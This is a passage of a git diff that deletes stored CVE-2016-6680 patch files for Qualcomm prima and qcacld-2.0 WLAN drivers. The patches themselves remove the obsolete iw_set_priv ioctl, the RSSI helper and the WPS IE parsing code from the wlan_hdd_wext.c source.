--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_MODEL_NUM:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_SERIAL_NUM:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_PRIMARY_DEVICE_TYPE:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1));
--                      hddLog(LOG1, "primary dev category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory);
--                      pos += 2;
--
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN);
--                      hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x", pos[0], pos[1], pos[2], pos[3]);
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory = (*pos<<8 | *(pos+1));
--                      hddLog(LOG1, "primary dev sub category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory);
--                      pos += 2;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_PRIMARYDEVICETYPE_PRESENT;
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_NAME:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
--                      pos += length;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICENAME_PRESENT;
--                      break;
--                   case HDD_WPS_ELEM_CONFIG_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ConfigMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod);
--                      pos += 2;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_CONFIGMETHODS_PRESENT;
--                      break;
--
--                   case HDD_WPS_ELEM_RF_BANDS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand = *pos;
--                      hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand);
--                      pos += 1;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RF_BANDS_PRESENT;
--                      break;
--              }  // switch
--            }
--         }
--         else
--         {
--            hddLog (LOGE, "%s WPS IE Mismatch %X",__func__, wps_genie[0]);
--         }
--
--      } // switch
--    }
--
--#ifdef WLAN_FEATURE_MBSSID
--    halStatus = WLANSAP_Set_WpsIe(WLAN_HDD_GET_SAP_CTX_PTR(pHostapdAdapter), pSap_WPSIe);
--#else
--    halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
--#endif
--    if (halStatus != eHAL_STATUS_SUCCESS)
--        ret = -EINVAL;
--    pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
--    if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
--    {
--        //hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
--        //v_CONTEXT_t pVosContext = pHostapdAdapter->pvosContext;
--#ifdef WLAN_FEATURE_MBSSID
--        WLANSAP_Update_WpsIe ( WLAN_HDD_GET_SAP_CTX_PTR(pHostapdAdapter) );
--#else
--        WLANSAP_Update_WpsIe ( pVosContext );
--#endif
--    }
--exit:
--    vos_mem_free(pSap_WPSIe);
--    kfree(fwps_genie);
--    EXIT();
--    return ret;
--}
--
--static int iw_softap_setwpsie(struct net_device *dev,
--                              struct iw_request_info *info,
--                              union iwreq_data *wrqu,
--                              char *extra)
--{
--	int ret;
--
--	vos_ssr_protect(__func__);
--	ret = __iw_softap_setwpsie(dev, info, wrqu, extra);
--	vos_ssr_unprotect(__func__);
--
--	return ret;
--}
--
- static int __iw_softap_stopbss(struct net_device *dev,
-                              struct iw_request_info *info,
-                              union iwreq_data *wrqu,
-@@ -6752,8 +6336,6 @@ static const struct iw_priv_args hostapd_private_args[] = {
- 
-   { QCSAP_IOCTL_GET_STAWPAIE,
-       IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 1, 0, "get_staWPAIE" },
--  { QCSAP_IOCTL_SETWPAIE,
--      IW_PRIV_TYPE_BYTE | QCSAP_MAX_WSC_IE | IW_PRIV_SIZE_FIXED, 0, "setwpaie" },
-   { QCSAP_IOCTL_STOPBSS,
-       IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED, 0, "stopbss" },
-   { QCSAP_IOCTL_VERSION, 0,
-@@ -6928,7 +6510,6 @@ static const iw_handler hostapd_private[] = {
-    [QCSAP_IOCTL_GETPARAM - SIOCIWFIRSTPRIV] = iw_softap_getparam,  //get priv ioctl
-    [QCSAP_IOCTL_SET_NONE_GET_THREE - SIOCIWFIRSTPRIV] = iw_softap_get_three,
-    [QCSAP_IOCTL_GET_STAWPAIE - SIOCIWFIRSTPRIV] = iw_get_genie, //get station genIE
--   [QCSAP_IOCTL_SETWPAIE - SIOCIWFIRSTPRIV] = iw_softap_setwpsie,
-    [QCSAP_IOCTL_STOPBSS - SIOCIWFIRSTPRIV] = iw_softap_stopbss,       // stop bss
-    [QCSAP_IOCTL_VERSION - SIOCIWFIRSTPRIV] = iw_softap_version,       // get driver version
-    [QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES - SIOCIWFIRSTPRIV] = iw_get_WPSPBCProbeReqIEs,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch
deleted file mode 100644
index 97b3afb3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch
+++ /dev/null
@@ -1,471 +0,0 @@
-From 08ce2a9e1ccdf6081fc1efb47d2edea4f4ad2ecf Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Tue, 9 Aug 2016 18:19:04 +0530
-Subject: wlan: Remove the support for iw_set_priv ioctl
-
-iw_set_priv is obsolete, now hdd_ioctl handles the
-driver commands.
-
-Remove the code related to iw_set_priv ioctl
-
-CRs-Fixed: 1048052
-Change-Id: I3e50fdc2f648ace1b6c260e3d579d93d8e546446
----
- CORE/HDD/src/wlan_hdd_wext.c | 427 +------------------------------------------
- 1 file changed, 1 insertion(+), 426 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 255a723..3ab228d 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -3765,69 +3765,6 @@ static int iw_get_linkspeed_priv(struct net_device *dev,
- }
- 
- /*
-- * Support for the RSSI & RSSI-APPROX private commands
-- * Per the WiFi framework the response must be of the form
-- *         "<ssid> rssi <xx>"
-- * unless we are not associated, in which case the response is
-- *         "OK"
-- */
--static int iw_get_rssi(struct net_device *dev,
--                       struct iw_request_info *info,
--                       union iwreq_data *wrqu, char *extra)
--{
--   hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--   char *cmd = extra;
--   int len = wrqu->data.length;
--   v_S7_t s7Rssi = 0;
--   hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
--   int ssidlen = pHddStaCtx->conn_info.SSID.SSID.length;
--   VOS_STATUS vosStatus;
--   int rc;
--
--   if ((eConnectionState_Associated != pHddStaCtx->conn_info.connState) ||
--       (0 == ssidlen) || (ssidlen >= len))
--   {
--      /* we are not connected or our SSID is too long
--         so we cannot report an rssi */
--      rc = scnprintf(cmd, len, "OK");
--   }
--   else
--   {
--      /* we are connected with a valid SSID
--         so we can write the SSID into the return buffer
--         (note that it is not NUL-terminated) */
--      memcpy(cmd, pHddStaCtx->conn_info.SSID.SSID.ssId, ssidlen );
--
--      vosStatus = wlan_hdd_get_rssi(pAdapter, &s7Rssi);
--
--      if (VOS_STATUS_SUCCESS == vosStatus)
--      {
--          /* append the rssi to the ssid in the format required by
--             the WiFI Framework */
--          rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi);
--          rc += ssidlen;
--      }
--      else
--      {
--          rc = -1;
--      }
--   }
--
--   /* verify that we wrote a valid response */
--   if ((rc < 0) || (rc >= len))
--   {
--      // encoding or length error?
--      hddLog(VOS_TRACE_LEVEL_ERROR,
--             "%s: Unable to encode RSSI, got [%s]",
--             __func__, cmd);
--      return -EIO;
--   }
--
--   /* a value is being successfully returned */
--   return rc;
--}
--
--/*
-  * Support for SoftAP channel range private command
-  */
- static int iw_softap_set_channel_range( struct net_device *dev,
-@@ -4262,368 +4199,6 @@ void* wlan_hdd_change_country_code_callback(void *pAdapter)
-     return NULL;
- }
- 
--static int __iw_set_priv(struct net_device *dev,
--                       struct iw_request_info *info,
--                       union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter;
--    char *cmd = NULL;
--    int cmd_len = wrqu->data.length;
--    int rc = 0, ret = 0;
--    VOS_STATUS vos_status = VOS_STATUS_SUCCESS;
--
--    hdd_context_t *pHddCtx;
--
--    ENTER();
--
--    pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    if (NULL == pAdapter)
--    {
--        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                  "mem_alloc_copy_from_user_helper fail");
--        return -EINVAL;
--    }
--    pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
--    rc = wlan_hdd_validate_context(pHddCtx);
--    if (0 != rc)
--    {
--        return rc;
--    }
--
--    cmd = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
--                                          wrqu->data.length);
--    if (NULL == cmd)
--    {
--        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                  "mem_alloc_copy_from_user_helper fail");
--        return -ENOMEM;
--    }
--
--    if (ioctl_debug)
--    {
--       pr_info("%s: req [%s] len [%d]\n", __func__, cmd, cmd_len);
--    }
--
--    hddLog(VOS_TRACE_LEVEL_INFO_MED,
--           "%s: ***Received %s cmd from Wi-Fi GUI***", __func__, cmd);
--
--    if (strncmp(cmd, "CSCAN", 5) == 0 )
--    {
--       if (eHAL_STATUS_SUCCESS != iw_set_cscan(dev, info, wrqu, cmd)) {
--           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                     "%s: Error in iw_set_scan!", __func__);
--          rc = -EINVAL;
--       }
--    }
--    else if( strcasecmp(cmd, "start") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Start command");
--        /*Exit from Deep sleep or standby if we get the driver START cmd from android GUI*/
--
--        vos_status = wlan_hdd_exit_lowpower(pHddCtx, pAdapter);
--        if (vos_status == VOS_STATUS_SUCCESS)
--        {
--            union iwreq_data wrqu;
--            char buf[10];
--
--            memset(&wrqu, 0, sizeof(wrqu));
--            wrqu.data.length = strlcpy(buf, "START", sizeof(buf));
--            wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf);
--        }
--        else
--        {
--            hddLog(VOS_TRACE_LEVEL_ERROR, "%s: START CMD Status %d", __func__, vos_status);
--            rc = -EIO;
--        }
--        goto done;
--    }
--    else if( strcasecmp(cmd, "stop") == 0 )
--    {
--        union iwreq_data wrqu;
--        char buf[10];
--
--        hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Stop command");
--
--        wlan_hdd_enter_lowpower(pHddCtx);
--        memset(&wrqu, 0, sizeof(wrqu));
--        wrqu.data.length = strlcpy(buf, "STOP", sizeof(buf));
--        wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf);
--        goto done;
--    }
--    else if (strcasecmp(cmd, "macaddr") == 0)
--    {
--        ret = snprintf(cmd, cmd_len, "Macaddr = " MAC_ADDRESS_STR,
--                       MAC_ADDR_ARRAY(pAdapter->macAddressCurrent.bytes));
--    }
--    else if (strcasecmp(cmd, "scan-active") == 0)
--    {
--        hddLog(LOG1,
--                FL("making default scan to active"));
--        pHddCtx->scan_info.scan_mode = eSIR_ACTIVE_SCAN;
--        ret = snprintf(cmd, cmd_len, "OK");
--    }
--    else if (strcasecmp(cmd, "scan-passive") == 0)
--    {
--        hddLog(LOG1,
--               FL("making default scan to passive"));
--        pHddCtx->scan_info.scan_mode = eSIR_PASSIVE_SCAN;
--        ret = snprintf(cmd, cmd_len, "OK");
--    }
--    else if( strcasecmp(cmd, "scan-mode") == 0 )
--    {
--        ret = snprintf(cmd, cmd_len, "ScanMode = %u", pHddCtx->scan_info.scan_mode);
--    }
--    else if( strcasecmp(cmd, "linkspeed") == 0 )
--    {
--        ret = iw_get_linkspeed(dev, info, wrqu, cmd);
--    }
--    else if( strncasecmp(cmd, "COUNTRY", 7) == 0 ) {
--        char *country_code;
--        long lrc;
--        eHalStatus eHal_status;
--
--        country_code =  cmd + 8;
--
--        init_completion(&pAdapter->change_country_code);
--
--        eHal_status = sme_ChangeCountryCode(pHddCtx->hHal,
--                                            (void *)(tSmeChangeCountryCallback)wlan_hdd_change_country_code_callback,
--                                            country_code,
--                                            pAdapter,
--                                            pHddCtx->pvosContext,
--                                            eSIR_TRUE,
--                                            eSIR_TRUE);
--
--        /* Wait for completion */
--        lrc = wait_for_completion_interruptible_timeout(&pAdapter->change_country_code,
--                                    msecs_to_jiffies(WLAN_WAIT_TIME_STATS));
--
--        if (lrc <= 0)
--        {
--            hddLog(VOS_TRACE_LEVEL_ERROR,"%s: SME %s while setting country code ",
--                   __func__, "Timed out");
--        }
--
--        if (eHAL_STATUS_SUCCESS != eHal_status)
--        {
--            VOS_TRACE( VOS_MODULE_ID_VOSS, VOS_TRACE_LEVEL_ERROR,
--                       "%s: SME Change Country code fail", __func__);
--            kfree(cmd);
--            return -EIO;
--        }
--    }
--    else if( strncasecmp(cmd, "rssi", 4) == 0 )
--    {
--        ret = iw_get_rssi(dev, info, wrqu, cmd);
--    }
--    else if( strncasecmp(cmd, "powermode", 9) == 0 ) {
--        int mode;
--        char *ptr;
--
--        if (9 < cmd_len)
--        {
--            ptr = (char*)(cmd + 9);
--
--        }else{
--              VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                        "CMD LENGTH %d is not correct",cmd_len);
--              kfree(cmd);
--              return -EINVAL;
--        }
--
--        if (1 != sscanf(ptr,"%d",&mode))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                      "powermode input %s is not correct",ptr);
--            kfree(cmd);
--            return -EIO;
--        }
--
--        wlan_hdd_enter_bmps(pAdapter, mode);
--        /*TODO:Set the power mode*/
--    }
--    else if (strncasecmp(cmd, "getpower", 8) == 0 ) {
--        v_U32_t pmc_state;
--        v_U16_t value;
--
--        pmc_state = pmcGetPmcState(WLAN_HDD_GET_HAL_CTX(pAdapter));
--        if(pmc_state == BMPS) {
--           value = DRIVER_POWER_MODE_AUTO;
--        }
--        else {
--           value = DRIVER_POWER_MODE_ACTIVE;
--        }
--        ret = snprintf(cmd, cmd_len, "powermode = %u", value);
--    }
--    else if( strncasecmp(cmd, "btcoexmode", 10) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "btcoexmode");
--        /*TODO: set the btcoexmode*/
--    }
--    else if( strcasecmp(cmd, "btcoexstat") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "BtCoex Status");
--        /*TODO: Return the btcoex status*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-start") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Start command");
--
--        /*TODO: Enable Rx data Filter*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-stop") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Stop command");
--
--        /*TODO: Disable Rx data Filter*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-statistics") == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "Rx Data Filter Statistics command");
--        /*TODO: rxfilter-statistics*/
--    }
--    else if( strncasecmp(cmd, "rxfilter-add", 12) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-add");
--        /*TODO: rxfilter-add*/
--    }
--    else if( strncasecmp(cmd, "rxfilter-remove",15) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-remove");
--        /*TODO: rxfilter-remove*/
--    }
--#ifdef FEATURE_WLAN_SCAN_PNO
--    else if( strncasecmp(cmd, "pnosetup", 8) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "pnosetup");
--        /*TODO: support pnosetup*/
--    }
--    else if( strncasecmp(cmd, "pnoforce", 8) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "pnoforce");
--        /*TODO: support pnoforce*/
--    }
--    else if( strncasecmp(cmd, "pno",3) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "pno");
--        vos_status = iw_set_pno(dev, info, wrqu, cmd, 3);
--        kfree(cmd);
--        return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL;
--    }
--    else if( strncasecmp(cmd, "rssifilter",10) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "rssifilter");
--        vos_status = iw_set_rssi_filter(dev, info, wrqu, cmd, 10);
--        kfree(cmd);
--        return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL;
--    }
--#endif /*FEATURE_WLAN_SCAN_PNO*/
--    else if( strncasecmp(cmd, "powerparams",11) == 0 ) {
--      hddLog( VOS_TRACE_LEVEL_INFO, "powerparams");
--      vos_status = iw_set_power_params(dev, info, wrqu, cmd, 11);
--      kfree(cmd);
--      return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL;
--    }
--    else if( 0 == strncasecmp(cmd, "CONFIG-TX-TRACKING", 18) ) {
--        tSirTxPerTrackingParam tTxPerTrackingParam;
--        char *ptr;
--
--        if (18 < cmd_len)
--        {
--           ptr = (char*)(cmd + 18);
--        }else{
--               VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                         "CMD LENGTH %d is not correct",cmd_len);
--               kfree(cmd);
--               return -EINVAL;
--        }
--
--        if (4 != sscanf(ptr,"%hhu %hhu %hhu %u",
--                        &(tTxPerTrackingParam.ucTxPerTrackingEnable),
--                        &(tTxPerTrackingParam.ucTxPerTrackingPeriod),
--                        &(tTxPerTrackingParam.ucTxPerTrackingRatio),
--                        &(tTxPerTrackingParam.uTxPerTrackingWatermark)))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                      "CONFIG-TX-TRACKING %s input is not correct",ptr);
--                      kfree(cmd);
--                      return -EIO;
--        }
--
--        // parameters checking
--        // period has to be larger than 0
--        if (0 == tTxPerTrackingParam.ucTxPerTrackingPeriod)
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Period input is not correct");
--            kfree(cmd);
--            return -EIO;
--        }
--
--        // use default value 5 is the input is not reasonable. in unit of 10%
--        if ((tTxPerTrackingParam.ucTxPerTrackingRatio > TX_PER_TRACKING_MAX_RATIO) || (0 == tTxPerTrackingParam.ucTxPerTrackingRatio))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Ratio input is not good. use default 5");
--            tTxPerTrackingParam.ucTxPerTrackingRatio = TX_PER_TRACKING_DEFAULT_RATIO;
--        }
--
--        // default is 5
--        if (0 == tTxPerTrackingParam.uTxPerTrackingWatermark)
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Tx Packet number input is not good. use default 5");
--            tTxPerTrackingParam.uTxPerTrackingWatermark = TX_PER_TRACKING_DEFAULT_WATERMARK;
--        }
--
--        if (eHAL_STATUS_SUCCESS !=
--            sme_SetTxPerTracking(pHddCtx->hHal,
--                                 hdd_tx_per_hit_cb,
--                                 (void*)pAdapter, &tTxPerTrackingParam)) {
--           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Set Tx PER Tracking Failed!");
--            rc = -EIO;
--        }
--    }
--    else {
--        hddLog( VOS_TRACE_LEVEL_WARN, "%s: Unsupported GUI command %s",
--                __func__, cmd);
--    }
--done:
--    /* many of the commands write information back into the command
--       string using snprintf().  check the return value here in one
--       place */
--    if ((ret < 0) || (ret >= cmd_len))
--    {
--       /* there was an encoding error or overflow */
--       rc = -EINVAL;
--    }
--    else if (ret > 0)
--    {
--       if (copy_to_user(wrqu->data.pointer, cmd, ret))
--       {
--          hddLog(VOS_TRACE_LEVEL_ERROR,
--                 "%s: failed to copy data to user buffer", __func__);
--          kfree(cmd);
--          return -EFAULT;
--       }
--       wrqu->data.length = ret;
--    }
--
--    if (ioctl_debug)
--    {
--       pr_info("%s: rsp [%s] len [%d] status %d\n",
--               __func__, cmd, wrqu->data.length, rc);
--    }
--    kfree(cmd);
--    EXIT();
--    return rc;
--}
--
--static int iw_set_priv(struct net_device *dev,
--                       struct iw_request_info *info,
--                       union iwreq_data *wrqu, char *extra)
--{
--   int ret;
--   vos_ssr_protect(__func__);
--   ret = __iw_set_priv(dev, info, wrqu, extra);
--   vos_ssr_unprotect(__func__);
--
--   return ret;
--}
--
- static int __iw_set_nick(struct net_device *dev,
-                        struct iw_request_info *info,
-                        union iwreq_data *wrqu, char *extra)
-@@ -10805,7 +10380,7 @@ static const iw_handler      we_handler[] =
-    (iw_handler) NULL,              /* SIOCGIWSENS */
-    (iw_handler) NULL,             /* SIOCSIWRANGE */
-    (iw_handler) iw_get_range,      /* SIOCGIWRANGE */
--   (iw_handler) iw_set_priv,       /* SIOCSIWPRIV */
-+   (iw_handler) NULL,              /* SIOCSIWPRIV */
-    (iw_handler) NULL,             /* SIOCGIWPRIV */
-    (iw_handler) NULL,             /* SIOCSIWSTATS */
-    (iw_handler) NULL,             /* SIOCGIWSTATS */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch
deleted file mode 100644
index 7d039296..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,480 +0,0 @@
-From 2f2fa073b95d4700de88c0f7558b4a18c13ac552 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Tue, 9 Aug 2016 16:10:39 +0530
-Subject: qcacld-2.0: Remove the support for iw_set_priv ioctl
-
-iw_set_priv is obsolete, now hdd_ioctl handles the
-driver commands.
-
-Remove the code related to iw_set_priv ioctl
-
-CRs-Fixed: 1048052
-Change-Id: Ic64a45aab2d23669d6d1219f6d2d8a465d34ac10
----
- CORE/HDD/src/wlan_hdd_wext.c | 436 +------------------------------------------
- 1 file changed, 1 insertion(+), 435 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index e8d0578..90431ea 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -4023,69 +4023,6 @@ static int iw_get_linkspeed_priv(struct net_device *dev,
- 	return ret;
- }
- 
--/*
-- * Support for the RSSI & RSSI-APPROX private commands
-- * Per the WiFi framework the response must be of the form
-- *         "<ssid> rssi <xx>"
-- * unless we are not associated, in which case the response is
-- *         "OK"
-- */
--static int iw_get_rssi(struct net_device *dev,
--                       struct iw_request_info *info,
--                       union iwreq_data *wrqu, char *extra)
--{
--   hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--   char *cmd = extra;
--   int len = wrqu->data.length;
--   v_S7_t s7Rssi = 0;
--   hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
--   int ssidlen = pHddStaCtx->conn_info.SSID.SSID.length;
--   VOS_STATUS vosStatus;
--   int rc;
--
--   if ((eConnectionState_Associated != pHddStaCtx->conn_info.connState) ||
--       (0 == ssidlen) || (ssidlen >= len))
--   {
--      /* we are not connected or our SSID is too long
--         so we cannot report an rssi */
--      rc = scnprintf(cmd, len, "OK");
--   }
--   else
--   {
--      /* we are connected with a valid SSID
--         so we can write the SSID into the return buffer
--         (note that it is not NUL-terminated) */
--      memcpy(cmd, pHddStaCtx->conn_info.SSID.SSID.ssId, ssidlen );
--
--      vosStatus = wlan_hdd_get_rssi(pAdapter, &s7Rssi);
--
--      if (VOS_STATUS_SUCCESS == vosStatus)
--      {
--          /* append the rssi to the ssid in the format required by
--             the WiFI Framework */
--          rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi);
--          rc += ssidlen;
--      }
--      else
--      {
--          rc = -1;
--      }
--   }
--
--   /* verify that we wrote a valid response */
--   if ((rc < 0) || (rc >= len))
--   {
--      // encoding or length error?
--      hddLog(VOS_TRACE_LEVEL_ERROR,
--             "%s: Unable to encode RSSI, got [%s]",
--             __func__, cmd);
--      return -EIO;
--   }
--
--   /* a value is being successfully returned */
--   return rc;
--}
--
- VOS_STATUS  wlan_hdd_enter_bmps(hdd_adapter_t *pAdapter, int mode)
- {
-    struct statsContext context;
-@@ -4323,377 +4260,6 @@ void* wlan_hdd_change_country_code_callback(void *pAdapter)
- }
- 
- /**
-- * __iw_set_priv() - SIOCSIWPRIV ioctl handler
-- * @dev: device upon which the ioctl was received
-- * @info: ioctl request information
-- * @wrqu: ioctl request data
-- * @extra: ioctl extra data
-- *
-- * Return: 0 on success, non-zero on error
-- */
--static int __iw_set_priv(struct net_device *dev, struct iw_request_info *info,
--			 union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    char *cmd = NULL;
--    int cmd_len = wrqu->data.length;
--    int ret = 0;
--    int rc = 0;
--    VOS_STATUS vos_status = VOS_STATUS_SUCCESS;
--
--    hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
--
--    ENTER();
--    cmd = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
--                                          wrqu->data.length);
--    if (NULL == cmd)
--    {
--        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                  "mem_alloc_copy_from_user_helper fail");
--        return -ENOMEM;
--    }
--
--    if (ioctl_debug)
--    {
--       pr_info("%s: req [%s] len [%d]\n", __func__, cmd, cmd_len);
--    }
--
--    hddLog(VOS_TRACE_LEVEL_INFO_MED,
--           "%s: ***Received %s cmd from Wi-Fi GUI***", __func__, cmd);
--
--    if (pHddCtx->isLogpInProgress) {
--        if (ioctl_debug)
--        {
--            pr_info("%s: RESTART in progress\n", __func__);
--        }
--
--        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                 "%s:LOGP in Progress. Ignore!!!",__func__);
--        vos_mem_free(cmd);
--        return -EBUSY;
--    }
--
--    if (strncmp(cmd, "CSCAN", 5) == 0 )
--    {
--       if (eHAL_STATUS_SUCCESS != iw_set_cscan(dev, info, wrqu, cmd)) {
